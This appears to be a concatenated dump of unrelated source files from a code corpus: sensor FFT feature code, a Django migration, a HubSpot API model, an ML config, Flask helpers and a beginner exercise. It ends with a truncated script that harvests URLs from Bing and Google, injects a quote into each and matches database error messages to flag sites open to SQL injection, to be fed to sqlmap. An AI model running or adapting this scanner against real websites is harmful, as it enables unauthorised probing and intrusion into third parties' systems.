ax_az_mse = ((df[accel_column_names[0]] - df[accel_column_names[2]]) ** 2).mean()
ay_az_mse = ((df[accel_column_names[1]] - df[accel_column_names[2]]) ** 2).mean()
        # mean squared error between gyroscope axis pairs (uses the gyro columns, mirroring the correlations above)
        gx_gy_mse = ((df[gyro_column_names[0]] - df[gyro_column_names[1]]) ** 2).mean()
        gx_gz_mse = ((df[gyro_column_names[0]] - df[gyro_column_names[2]]) ** 2).mean()
        gy_gz_mse = ((df[gyro_column_names[1]] - df[gyro_column_names[2]]) ** 2).mean()
basic_df = pd.DataFrame([[timestamp, localtime, user, int(version), start_time, end_time, ax_ay_corr,
ax_az_corr, ay_az_corr, gx_gy_corr, gx_gz_corr, gy_gz_corr, ax_ay_mse, ax_az_mse,
ay_az_mse, gx_gy_mse, gx_gz_mse, gy_gz_mse]],
columns=['timestamp', 'localtime', 'user', 'version', 'start_time', 'end_time',
"ax_ay_corr", 'ax_az_corr', 'ay_az_corr', 'gx_gy_corr', 'gx_gz_corr',
'gy_gz_corr', 'ax_ay_mse', 'ax_az_mse', 'ay_az_mse', 'gx_gy_mse',
'gx_gz_mse', 'gy_gz_mse'])
return basic_df
data = self.compute(get_corr_mse_features_udf, windowDuration=windowDuration, slideDuration=slideDuration,
groupByColumnName=groupByColumnName, startTime=startTime)
return DataStream(data=data._data, metadata=Metadata())
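# --- Usage sketch (illustrative only) ----------------------------------------------
# Assuming `ds` is a CerebralCortex DataStream exposing this helper and carrying the
# default accelerometer/gyroscope column names, a windowed feature pass looks like:
#
#   corr_mse = ds.compute_corr_mse_accel_gyro(windowDuration=10,
#                                             slideDuration=10,
#                                             groupByColumnName=["user"])
#   # `corr_mse` is again a DataStream (see the return statement above)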
def compute_fourier_features(self, exclude_col_names: list = [],
feature_names=["fft_centroid", 'fft_spread', 'spectral_entropy',
'spectral_entropy_old', 'fft_flux',
'spectral_falloff'], windowDuration: int = None,
slideDuration: int = None,
groupByColumnName: List[str] = [], startTime=None):
"""
Transforms data from time domain to frequency domain.
Args:
exclude_col_names list(str): name of the columns on which features should not be computed
feature_names list(str): names of the features. Supported features are fft_centroid, fft_spread, spectral_entropy, spectral_entropy_old, fft_flux, spectral_falloff
windowDuration (int): duration of a window in seconds
slideDuration (int): slide duration of a window
groupByColumnName List[str]: groupby column names, for example, groupby user, col1, col2
startTime (datetime): The startTime is the offset with respect to 1970-01-01 00:00:00 UTC with which to start window intervals. For example, in order to have hourly tumbling windows that start 15 minutes past the hour, e.g. 12:15-13:15, 13:15-14:15... provide startTime as 15 minutes. First time of data will be used as startTime if none is provided
Returns:
DataStream object with all the existing data columns and FFT features
"""
eps = 0.00000001
exclude_col_names.extend(["timestamp", "localtime", "user", "version"])
data = self._data.drop(*exclude_col_names)
df_column_names = data.columns
basic_schema = StructType([
StructField("timestamp", TimestampType()),
StructField("localtime", TimestampType()),
StructField("user", StringType()),
StructField("version", IntegerType()),
StructField("start_time", TimestampType()),
StructField("end_time", TimestampType())
])
features_list = []
for cn in df_column_names:
for sf in feature_names:
features_list.append(StructField(cn + "_" + sf, FloatType(), True))
features_schema = StructType(basic_schema.fields + features_list)
def stSpectralCentroidAndSpread(X, fs):
"""Computes spectral centroid of frame (given abs(FFT))"""
ind = (np.arange(1, len(X) + 1)) * (fs / (2.0 * len(X)))
Xt = X.copy()
Xt = Xt / Xt.max()
NUM = np.sum(ind * Xt)
DEN = np.sum(Xt) + eps
# Centroid:
C = (NUM / DEN)
# Spread:
S = np.sqrt(np.sum(((ind - C) ** 2) * Xt) / DEN)
# Normalize:
C = C / (fs / 2.0)
S = S / (fs / 2.0)
return (C, S)
def stSpectralFlux(X, Xprev):
"""
Computes the spectral flux feature of the current frame
ARGUMENTS:
X: the abs(fft) of the current frame
Xpre: the abs(fft) of the previous frame
"""
# compute the spectral flux as the sum of square distances:
sumX = np.sum(X + eps)
sumPrevX = np.sum(Xprev + eps)
F = np.sum((X / sumX - Xprev / sumPrevX) ** 2)
return F
def stSpectralRollOff(X, c, fs):
"""Computes spectral roll-off"""
totalEnergy = np.sum(X ** 2)
fftLength = len(X)
Thres = c * totalEnergy
        # Find the spectral rolloff as the frequency position where the respective spectral energy is equal to c*totalEnergy
CumSum = np.cumsum(X ** 2) + eps
[a, ] = np.nonzero(CumSum > Thres)
if len(a) > 0:
mC = np.float64(a[0]) / (float(fftLength))
else:
mC = 0.0
return (mC)
def stSpectralEntropy(X, numOfShortBlocks=10):
"""Computes the spectral entropy"""
L = len(X) # number of frame samples
Eol = np.sum(X ** 2) # total spectral energy
subWinLength = int(np.floor(L / numOfShortBlocks)) # length of sub-frame
if L != subWinLength * numOfShortBlocks:
X = X[0:subWinLength * numOfShortBlocks]
subWindows = X.reshape(subWinLength, numOfShortBlocks,
order='F').copy() # define sub-frames (using matrix reshape)
s = np.sum(subWindows ** 2, axis=0) / (Eol + eps) # compute spectral sub-energies
En = -np.sum(s * np.log2(s + eps)) # compute spectral entropy
return En
def spectral_entropy(data, sampling_freq, bands=None):
psd = np.abs(np.fft.rfft(data)) ** 2
psd /= np.sum(psd) # psd as a pdf (normalised to one)
if bands is None:
power_per_band = psd[psd > 0]
else:
freqs = np.fft.rfftfreq(data.size, 1 / float(sampling_freq))
bands = np.asarray(bands)
freq_limits_low = np.concatenate([[0.0], bands])
freq_limits_up = np.concatenate([bands, [np.Inf]])
            power_per_band = np.asarray([np.sum(psd[np.bitwise_and(freqs >= low, freqs < up)])
                                         for low, up in zip(freq_limits_low, freq_limits_up)])
power_per_band = power_per_band[power_per_band > 0]
return -np.sum(power_per_band * np.log2(power_per_band))
def fourier_features_pandas_udf(data, frequency: float = 16.0):
Fs = frequency # the sampling freq (in Hz)
results = []
# fourier transforms!
# data_fft = abs(np.fft.rfft(data))
X = abs(np.fft.fft(data))
nFFT = int(len(X) / 2) + 1
X = X[0:nFFT] # normalize fft
X = X / len(X)
if "fft_centroid" or "fft_spread" in feature_names:
C, S = stSpectralCentroidAndSpread(X, Fs) # spectral centroid and spread
if "fft_centroid" in feature_names:
results.append(C)
if "fft_spread" in feature_names:
results.append(S)
if "spectral_entropy" in feature_names:
se = stSpectralEntropy(X) # spectral entropy
results.append(se)
if "spectral_entropy_old" in feature_names:
            se_old = spectral_entropy(X, frequency)  # spectral entropy (alternative implementation)
results.append(se_old)
if "fft_flux" in feature_names:
flx = stSpectralFlux(X, X.copy()) # spectral flux
results.append(flx)
if "spectral_folloff" in feature_names:
roff = stSpectralRollOff(X, 0.90, frequency) # spectral rolloff
results.append(roff)
return pd.Series(results)
@pandas_udf(features_schema, PandasUDFType.GROUPED_MAP)
def get_fft_features(df):
timestamp = df['timestamp'].iloc[0]
localtime = df['localtime'].iloc[0]
user = df['user'].iloc[0]
version = df['version'].iloc[0]
start_time = timestamp
end_time = df['timestamp'].iloc[-1]
df.drop(exclude_col_names, axis=1, inplace=True)
df_ff = df.apply(fourier_features_pandas_udf)
df3 = df_ff.T
pd.set_option('display.max_colwidth', -1)
# split column into multiple columns
# df3 = pd.DataFrame(df_ff.values.tolist(), index=df_ff.index)
# print("**"*50)
# print(type(df), type(df_ff), type(df3))
# print(df)
# print(df_ff)
# print(df_ff.values.tolist())
# print(df3)
# print("**" * 50)
# print("FEATURE-NAMES", feature_names)
df3.columns = feature_names
# multiple rows to one row
output = df3.unstack().to_frame().sort_index(level=1).T
output.columns = [f'{j}_{i}' for i, j in output.columns]
basic_df = pd.DataFrame([[timestamp, localtime, user, int(version), start_time, end_time]],
columns=['timestamp', 'localtime', 'user', 'version', 'start_time', 'end_time'])
# df.insert(loc=0, columns=, value=basic_cols)
return basic_df.assign(**output)
return self.compute(get_fft_features, windowDuration=windowDuration, slideDuration=slideDuration,
groupByColumnName=groupByColumnName, startTime=startTime) | 44.456081 | 357 | 0.614028 | [
"BSD-2-Clause"
] | MD2Korg/CerebralCortex-2.0 | cerebralcortex/markers/brushing/features.py | 13,159 | Python |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('addressbook', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='address',
name='country',
field=models.CharField(max_length=3, verbose_name='country'),
),
]
| 21 | 73 | 0.609524 | [
"BSD-3-Clause"
] | 7wonders/django-addresses | addressbook/migrations/0002_auto_20150903_2227.py | 420 | Python |
# coding: utf-8
"""
Files
Upload and manage files. # noqa: E501
The version of the OpenAPI document: v3
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from hubspot.files.files.configuration import Configuration
class NextPage(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {"after": "str", "link": "str"}
attribute_map = {"after": "after", "link": "link"}
def __init__(self, after=None, link=None, local_vars_configuration=None): # noqa: E501
"""NextPage - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._after = None
self._link = None
self.discriminator = None
self.after = after
if link is not None:
self.link = link
@property
def after(self):
"""Gets the after of this NextPage. # noqa: E501
:return: The after of this NextPage. # noqa: E501
:rtype: str
"""
return self._after
@after.setter
def after(self, after):
"""Sets the after of this NextPage.
:param after: The after of this NextPage. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and after is None: # noqa: E501
raise ValueError("Invalid value for `after`, must not be `None`") # noqa: E501
self._after = after
@property
def link(self):
"""Gets the link of this NextPage. # noqa: E501
:return: The link of this NextPage. # noqa: E501
:rtype: str
"""
return self._link
@link.setter
def link(self, link):
"""Sets the link of this NextPage.
:param link: The link of this NextPage. # noqa: E501
:type: str
"""
self._link = link
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items()))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, NextPage):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, NextPage):
return True
return self.to_dict() != other.to_dict()
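# --- Usage sketch (not part of the generated model) --------------------------------
# NextPage is a plain value object: `after` is required (the setter rejects None when
# client-side validation is on), `link` is optional, and to_dict() serialises both.
#
#   page = NextPage(after="abc123")
#   page.to_dict()   # -> {"after": "abc123", "link": None}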
| 27.385185 | 139 | 0.583717 | [
"Apache-2.0"
] | Catchoom/hubspot-api-python | hubspot/files/files/models/next_page.py | 3,697 | Python |
import os
import sys
import pandas as pd
import numpy as np
import pdb
import torch
import torch.nn as nn
import torch.nn.functional as F
sys.path.insert(1,"../")
sys.path.insert(1,"../../")
sys.path.insert(1,"../../../")
sys.path.insert(1,"../../../../")
sys.path.insert(1,"../../../../../")
from config_u import base
from data_generators import cpmg_generator_1A
from load_fully_quantified_cpmg_data import fq_v_ppm_spectra, fq_v_spectra, fq_v_statistics, fq_v_quant, fq_v_class_labels, fq_v_metabolite_names, fq_v_fold_dct, SEED
from metabolite_mapping import dataset2folder, folder2dataset
# task configuration
task = "gaba"
dataset_task = folder2dataset[task]
task_target_idx = fq_v_metabolite_names.index(dataset_task)
# data configuration
ppm_spectra = fq_v_ppm_spectra
spectra = fq_v_spectra
statistics = fq_v_statistics
quant = fq_v_quant[:,task_target_idx].reshape((-1,1))
class_labels = fq_v_class_labels
metabolite_names = [fq_v_metabolite_names[task_target_idx]]
fold_dct = fq_v_fold_dct
K = 5
generator = cpmg_generator_1A
# save and log configuration
model_name = f"full_ppm_spectrum_network_per_metabolite/{task}/seed_{SEED}/"
model_base_path = os.path.join(base, "models/cpmg/automated_metabolite_quantification/"+model_name)
log_base_path = os.path.join(base, "logs/cpmg/automated_metabolite_quantification/"+model_name)
plot_base_path = os.path.join(base, "plots/cpmg/automated_metabolite_quantification/"+model_name)
# neural network model configuration
num_epochs = 2000
weight_seed = SEED
hp_space = {
"ETA": 10**-2.1,
"weight_decay": 0.00001
}
# gpu/cpu device selection
gpu_id = int(input("GPU index: "))
if torch.cuda.is_available():
device = torch.device(f"cuda:{gpu_id}")
print(f"GPU {gpu_id} is available")
else:
device = torch.device("cpu")
print("GPU is not available")
# Quantification model
class Model(nn.Module):
def __init__(self):
super(Model, self).__init__()
self.all_mutual = nn.Linear(1401, 192)
self.m1 = nn.Linear(192,1)
def forward(self, x):
inp = F.relu(self.all_mutual(x))
m1 = F.relu(self.m1(inp)).squeeze()
return m1
# weight initialization
def initialize_weights(m):
if type(m) == nn.Linear:
torch.nn.init.kaiming_uniform_(m.weight)
m.bias.data.fill_(0.01)
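# --- Illustrative wiring of the pieces above (a sketch, not the training script) ---
# Standard PyTorch usage of Model, initialize_weights and the hyperparameters
# defined earlier in this config; the optimizer choice (Adam) is an assumption.
#
#   torch.manual_seed(weight_seed)
#   model = Model().to(device)
#   model.apply(initialize_weights)          # kaiming-uniform init on each nn.Linear
#   optimizer = torch.optim.Adam(model.parameters(),
#                                lr=hp_space["ETA"],
#                                weight_decay=hp_space["weight_decay"])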
# measurement metric and timing storage
metric_names = ["mae", "mse", "mape", "r2", "absolute_percentage_error"]
metrics = {}
for name in metric_names:
metrics[name] = {}
for metabolite_name in metabolite_names:
metrics[name][metabolite_name] = []
timing_mode = ["train", "test"]
runtime = {}
for mode in timing_mode:
runtime[mode] = [] | 32.069767 | 167 | 0.705584 | [
"MIT"
] | ciceklab/targeted_brain_tumor_margin_assessment | train_with_your_data/scripts/cpmg/automated_metabolite_quantification/full_ppm_spectrum_network_per_metabolite/gaba/config.py | 2,758 | Python |
from flask import session, jsonify, redirect, request, Response, abort
from flask_login import current_user
from werkzeug.utils import secure_filename
from functools import wraps
from srht.objects import User
from srht.database import db, Base
from srht.config import _cfg
import json
import os
import urllib
import requests
import xml.etree.ElementTree as ET
import hashlib
def firstparagraph(text):
try:
para = text.index("\n\n")
return text[:para + 2]
except:
try:
para = text.index("\r\n\r\n")
return text[:para + 4]
except:
return text
def with_session(f):
@wraps(f)
def go(*args, **kw):
try:
ret = f(*args, **kw)
db.commit()
return ret
except:
db.rollback()
db.close()
raise
return go
def loginrequired(f):
@wraps(f)
def wrapper(*args, **kwargs):
if not current_user or not current_user.approved:
return redirect("/login?return_to=" + urllib.parse.quote_plus(request.url))
else:
return f(*args, **kwargs)
return wrapper
def adminrequired(f):
@wraps(f)
def wrapper(*args, **kwargs):
if not current_user or not current_user.approved:
return redirect("/login?return_to=" + urllib.parse.quote_plus(request.url))
else:
if not current_user.admin:
abort(401)
return f(*args, **kwargs)
return wrapper
def json_output(f):
@wraps(f)
def wrapper(*args, **kwargs):
def jsonify_wrap(obj):
jsonification = json.dumps(obj)
return Response(jsonification, mimetype='application/json')
result = f(*args, **kwargs)
if isinstance(result, tuple):
return jsonify_wrap(result[0]), result[1]
if isinstance(result, dict):
return jsonify_wrap(result)
if isinstance(result, list):
return jsonify_wrap(result)
# This is a fully fleshed out response, return it immediately
return result
return wrapper
def cors(f):
@wraps(f)
def wrapper(*args, **kwargs):
res = f(*args, **kwargs)
if request.headers.get('x-cors-status', False):
if isinstance(res, tuple):
json_text = res[0].data
code = res[1]
else:
json_text = res.data
code = 200
o = json.loads(json_text)
o['x-status'] = code
return jsonify(o)
return res
return wrapper
def file_link(path):
return _cfg("protocol") + "://" + _cfg("domain") + "/" + path
def disown_link(path):
return _cfg("protocol") + "://" + _cfg("domain") + "/disown?filename=" + path
# https://stackoverflow.com/questions/4453602/how-to-find-the-mountpoint-a-file-resides-on/4453715#4453715
def find_mount_point(path):
path = os.path.abspath(path)
while not os.path.ismount(path):
path = os.path.dirname(path)
return path
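# --- Usage sketch (illustrative only, not part of srht) ----------------------------
# Typical way the decorators above are stacked on a Flask view; the route, app and
# response body below are made up for this example.
#
#   @app.route("/api/whoami")
#   @loginrequired
#   @json_output
#   def whoami():
#       return {"username": current_user.username}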
| 27.106195 | 106 | 0.588965 | [
"MIT"
] | prplecake/legacy.sr.ht | srht/common.py | 3,063 | Python |
"""
For...in in Python
Iterating over strings with for...in
The range function takes these arguments (start=0, stop, step=1)
"""
texto = input('informe seu CPF: ')
texto_novo = ''
for letra in range(len(texto)):
if letra % 3 == 0:
texto_novo += '.' + texto[letra]
continue
texto_novo += texto[letra]
print(texto_novo[1:]) | 19.941176 | 60 | 0.625369 | [
"MIT"
] | KaicPierre/Curso-de-Python3 | basico/aula019/aula019.py | 341 | Python |
#!/usr/bin/python python3
#
# Python script for finding websites which are prone to SQL injections
# Do crawling on bing or google for possible vuln urls
# Check url with qoute ' and catch error messages
# Run sqlmap against urls
#
# License:
# MIT - (c) 2016 ThomasTJ (TTJ)
#
import sys # Quit the shiat
import os # Working with files and starting sqlmap
import re # Searching web results for vuln
import requests # Calling websites
import urllib.parse # Parsing url encoding for search
import shutil # Checking if SQLmap is installed
import psutil # Checking possible VPN connection
import http.client # Ping to check network connection
import random # Shuffle between user agents
import time # Printing time when scraping and checking urls
from time import sleep # Multiple use cases, e.g. sleep between requests
from bs4 import BeautifulSoup # Working with website date
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
ITALIC = '\x1B[3m'
# Variables which needs to be defined
filenameRawUrl = "0"
filenameVulnUrl = "0"
def LoadUserAgents(uafile="user_agents.txt"):
# uafile : string, path to text file of user agents, one per line
uas = []
with open(uafile, 'rb') as uaf:
for ua in uaf.readlines():
if ua:
uas.append(ua.strip()[1:-1-1])
random.shuffle(uas)
return uas
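# Usage sketch: the helper above is consumed later in this script exactly like this
# ("user_agents.txt" is assumed to hold one quoted user-agent string per line).
#
#   uas = LoadUserAgents()
#   headers = {"Connection": "close", "User-Agent": random.choice(uas)}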
def inputSearchUrls():
print("\n" + bcolors.HEADER)
print(" #===================================#")
print(" # #")
print(" # Find urls which might is vuln for #")
print(" # SQL injections #")
print(" # #")
print(" #===================================#")
print("\n" + bcolors.ENDC)
print(" Basesearch could be: php?id=, php?cat=, e.g.\n")
# =================================
# Base input
# =================================
# @type basesearch: str
# @param basesearch: Query string. Must NOT be url-encoded.
basesearch = input(" Enter base search string: " + bcolors.OKBLUE)
# @type searchprovider: str
# @param searchprovider: Who should perform the search.
searchprovider = input(bcolors.ENDC + " Bing or Google (b/g): " + bcolors.OKBLUE)
if searchprovider.lower() not in ('b', 'g'):
print(bcolors.WARNING + " - Wrong input - only 'b' and 'g' allowed. Using 'b'")
searchprovider = 'b'
# @type maxperpage: int/str (changed to string)
# @param maxperpage: Max results returned per page
maxperpage = input(bcolors.ENDC + " Results per page: " + bcolors.OKBLUE)
if not maxperpage.isdigit():
print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 20")
maxperpage = 20
# @type maxpages: int
# @param maxpages: Max pages to loop through
maxpages = input(bcolors.ENDC + " Number of pages: " + bcolors.OKBLUE)
if not maxpages.isdigit():
print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 10")
maxpages = 10
# @type startpage: int
# @param startpage: First page to look in
startpage = input(bcolors.ENDC + " Start pages: " + bcolors.OKBLUE)
if not startpage.isdigit():
print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 0")
startpage = 0
if int(startpage) > 0:
startpage = (int(startpage) - 1)
# @type timeout: int
# @param timeout: Sleep between request
timeout = input(bcolors.ENDC + " Enter pause between requests: " + bcolors.OKBLUE)
if not timeout.isdigit():
print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 6")
timeout = 6
# @type savesearch: str
# @param savesearch: Save the shiat to a file
savesearch = input(bcolors.ENDC + " Save search (y/N): " + bcolors.OKBLUE)
if savesearch.lower() not in ('', 'y', 'n'):
print(bcolors.WARNING + " - Wrong input - only 'y' and 'n' allowed. Using 'n'")
savesearch = 'n'
# @type filename: str
# @param filename: Filename for file containing the search results
if savesearch.lower() == "y":
filename = input(bcolors.ENDC + " Filename for search: " + bcolors.OKBLUE)
if not os.path.isfile(filename):
os.mknod(filename)
else:
appendtofile = input(bcolors.ENDC + " File exists, append (Y/n): " + bcolors.OKBLUE)
if appendtofile == "n":
print(bcolors.WARNING + " - User disallowed appending to resultfile")
print(bcolors.WARNING + " - Please try again with another filename")
print(bcolors.WARNING + " - Exiting")
sys.exit()
else:
filename = ""
filename = "tmpurllist"
# =================================
# Make variables ready to use
# =================================
count = str(maxperpage)
startpage = int(startpage)
pages = (int(maxpages) + startpage)
sleeptime = int(timeout)
string = str(basesearch)
stringurl = urllib.parse.quote_plus(string)
print(bcolors.ENDC + "\n [*]:: Searching")
print(bcolors.HEADER + bcolors.BOLD + "\n" + " [+] Results" + bcolors.ENDC)
searchUrlForString(searchprovider, count, startpage, pages, sleeptime, string, stringurl, savesearch, filename)
def searchUrlForString(searchprovider, count, startpage, pages, sleeptime, string, stringurl, savesearch, filename):
# =================================
# Loop through pages
# =================================
for start in range(startpage, pages):
# try:
# =========================
# Bing search
# =========================
if searchprovider == "b":
pagenr = int(start)*int(count)+1
address = "http://www.bing.com/search?q=instreamset:(url title):" + stringurl + "&count=" + count + "&first=" + str(pagenr)
print(" [*] Page number: " + str(int(start)+1))
# Loading random useragent
uas = LoadUserAgents()
ua = random.choice(uas) # select a random user agent
headers = {"Connection": "close", "User-Agent": ua}
r = requests.get(address, headers=headers)
soup = BeautifulSoup(r.text, 'lxml')
for d in soup.find_all('h2'):
for a in d.find_all('a', href=True):
if string in a['href']:
print(
bcolors.OKGREEN
+ " ["
+ time.strftime("%H:%M:%S")
+ "] [+] " + a['href'] + bcolors.ENDC
)
if filename:
with open(filename, 'a') as file:
file.write(a['href'] + "\n")
elif "0.r.msn." in a['href']:
pass
else:
pass
sleep(sleeptime)
# =========================
# Google search
# =========================
elif searchprovider == "g":
pagenr = int(start)*int(count)
address = "https://www.google.dk/search?q=" + stringurl + "&num=" + count + "&start=" + str(pagenr)
# address = "https://www.google.dk/search?q=inurl%3A" + stringurl + "&num=" + count + "&start=" + str(pagenr)
print(" [*] Page number: " + str(int(start)+1))
# Loading random useragent
uas = LoadUserAgents()
ua = random.choice(uas) # select a random user agent
headers = {"Connection": "close", "User-Agent": ua}
r = requests.get(address, headers=headers)
soup = BeautifulSoup(r.text, 'lxml')
for d in soup.find_all('cite'):
url = d.text
if string in url:
print(
bcolors.OKGREEN
+ " ["
+ time.strftime("%H:%M:%S")
+ "] [+] " + url + bcolors.ENDC
)
if filename == "y":
with open(filename, 'a') as file:
file.write(url + "\n")
sleep(sleeptime)
try:
print("")
# =============================
# Error, end, exit
# =============================
except KeyboardInterrupt:
print(bcolors.FAIL + " User input - Ctrl + c" + bcolors.ENDC)
quitnow = input(bcolors.ENDC + bcolors.BOLD + " Exit program (y/N): " + bcolors.OKBLUE)
if quitnow == "y":
print(bcolors.ENDC + " // Exiting\n\n")
sys.exit()
else:
print(bcolors.ENDC + " // Continuing\n\n")
except:
print(bcolors.FAIL + " ERROR!!! " + bcolors.ENDC)
# =================================
# Done - sum it up
# =================================
print("\n Done scraping")
with open(filename) as f:
resultsnumber = sum(1 for _ in f)
if savesearch == "y":
print(" Scraping saved in file: " + filename)
print(" Total saved urls: " + str(resultsnumber))
else:
print(" Total urls collected: " + str(resultsnumber))
# Check urls? Next function activates..
checkurls = input(bcolors.ENDC + "\n Would you like to check urls for vuln (Y/n): " + bcolors.OKBLUE)
if checkurls.lower() not in ('', 'y', 'n'):
print(bcolors.WARNING + " - Wrong input - only 'y' and 'n' allowed. Using 'y'")
checkurls = "y"
if checkurls == "n":
print(bcolors.ENDC + " // Exiting\n\n")
try:
os.remove("tmpurllist")
except OSError:
pass
sys.exit()
else:
checkUrlsForVuln(filename)
def checkUrlsForVuln(filenameRawUrl):
print("\n\n\n" + bcolors.HEADER)
print(" #===============================#")
print(" # #")
print(" # Check if urls is vuln for #")
print(" # SQL injection #")
print(" # #")
print(" #===============================#")
print("\n" + bcolors.ENDC)
# =================================
# Base input
# =================================
# Base input
if filenameRawUrl != "0":
print(" Filepath from run is still in memory: " + filenameRawUrl)
urlfileChoose = input(bcolors.ENDC + " (i)nput new filename, or (u)se from memory (i/U): " + bcolors.OKBLUE)
if urlfileChoose not in ('i', 'u'):
print(bcolors.WARNING + " - Using from memory")
urlfileChoose = 'u'
if urlfileChoose == 'u':
urlfile = filenameRawUrl
else:
# @type urlfile: str
# @param urlfile: File with the raw urls to check.
urlfile = input(bcolors.ENDC + " Filename with urls: " + bcolors.OKBLUE)
else:
# @type urlfile: str
# @param urlfile: File with the raw urls to check.
urlfile = input(bcolors.ENDC + " Filename with urls: " + bcolors.OKBLUE)
if not os.path.isfile(urlfile):
print(bcolors.FAIL + " Specified file does not exist.")
print(bcolors.FAIL + " Exiting")
sys.exit()
# @type verboseactive: str
# @param verboseactive: Verboselevel.
verboseactive = input(bcolors.ENDC + " Verboselevel (0, 1, 2): " + bcolors.OKBLUE)
if not verboseactive:
print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 0")
verboseactive = "0"
# @type savesearch: str
# @param savesearch: Save the scan to file.
savesearch = input(bcolors.ENDC + " Save search (y/N): " + bcolors.OKBLUE)
if savesearch.lower() not in ('', 'y', 'n'):
print(bcolors.WARNING + " - Wrong input - only 'y' and 'n' allowed. Using 'y'")
savesearch = 'y'
# @type filename: str
# @param filename: Filename for the shiat.
if savesearch == "y":
filename = input(bcolors.ENDC + " Filename for results: " + bcolors.OKBLUE)
if not filename:
print(bcolors.WARNING + " - Wrong input - using 'vulnurls' as filename")
filename = "vulnurls"
if not os.path.isfile(filename):
os.mknod(filename)
else:
appendtofile = input(bcolors.ENDC + " File exists, append (Y/n): " + bcolors.OKBLUE)
if appendtofile == "n":
print(" User disallowed appending to resultfile")
print(" Please try again with another filename")
print(" Exiting")
sys.exit()
else:
filename = "0"
print(bcolors.ENDC + "\n [*]::Reading file\n")
print(" [*] Connecting\n")
# =================================
    # Loop through urls and add a quote
# =================================
with open(urlfile) as fileorg:
for line in fileorg:
checkMY1 = 0
checkMY2 = 0
checkMY3 = 0
checkMY4 = 0
checkMS1 = 0
checkMS2 = 0
checkMS3 = 0
checkOR1 = 0
checkOR2 = 0
checkOR3 = 0
checkPO1 = 0
checkPO2 = 0
try:
# Get data
url = line + "'"
print(
" ["
+ time.strftime("%H:%M:%S")
+ "] [*] " + line.strip('\n')
)
# Loading random useragent
uas = LoadUserAgents()
ua = random.choice(uas) # select a random user agent
headers = {"Connection": "close", "User-Agent": ua}
r = requests.get(url, headers=headers)
soup = BeautifulSoup(r.text, 'lxml')
# Check if vuln - might updated indicationstrings according to
# MySQL
checkMY1 = len(soup.find_all(text=re.compile('check the manual that corresponds to your MySQL')))
checkMY2 = len(soup.find_all(text=re.compile('SQL syntax')))
checkMY3 = len(soup.find_all(text=re.compile('server version for the right syntax')))
checkMY4 = len(soup.find_all(text=re.compile('expects parameter 1 to be')))
# Microsoft SQL server
checkMS1 = len(soup.find_all(text=re.compile('Unclosed quotation mark before the character string')))
                checkMS2 = len(soup.find_all(text=re.compile('An unhandled exception occurred during the execution')))
checkMS3 = len(soup.find_all(text=re.compile('Please review the stack trace for more information')))
# Oracle Errors
checkOR1 = len(soup.find_all(text=re.compile('java.sql.SQLException: ORA-00933')))
checkOR2 = len(soup.find_all(text=re.compile('SQLExceptionjava.sql.SQLException')))
checkOR3 = len(soup.find_all(text=re.compile('quoted string not properly terminated')))
# Postgre SQL
checkPO1 = len(soup.find_all(text=re.compile('Query failed:')))
checkPO2 = len(soup.find_all(text=re.compile('unterminated quoted string at or near')))
# Verbose level 1
if verboseactive == "1":
print(" [V] Check1 MySQL found: " + str(checkMY1))
print(" [V] Check2 MySQL found: " + str(checkMY2))
print(" [V] Check3 MySQL found: " + str(checkMY3))
print(" [V] Check4 MySQL found: " + str(checkMY4))
print(" [V] Check5 MS SQL found: " + str(checkMS1))
print(" [V] Check6 MS SQL found: " + str(checkMS2))
print(" [V] Check7 MS SQL found: " + str(checkMS3))
print(" [V] Check8 Oracle found: " + str(checkOR1))
print(" [V] Check9 Oracle found: " + str(checkOR2))
print(" [V] Check10 Oracle found: " + str(checkOR3))
print(" [V] Check11 Postgre found: " + str(checkPO1))
print(" [V] Check12 Postgre found: " + str(checkPO2))
# Verbose level 2
if verboseactive == "2":
checkverMY1 = soup.find(text=re.compile('check the manual that corresponds to your MySQL'))
checkverMY2 = soup.find(text=re.compile(r'SQL syntax'))
checkverMY3 = soup.find(text=re.compile(r'server version for the right syntax'))
checkverMY4 = soup.find(text=re.compile('expects parameter 1 to be'))
print(" [V] Check1 MySQL found: " + str(checkverMY1).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check2 MySQL found: " + str(checkverMY2).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check3 MySQL found: " + str(checkverMY3).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check4 MySQL found: " + str(checkverMY4).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
checkverMS1 = soup.find(text=re.compile('Unclosed quotation mark before the character string'))
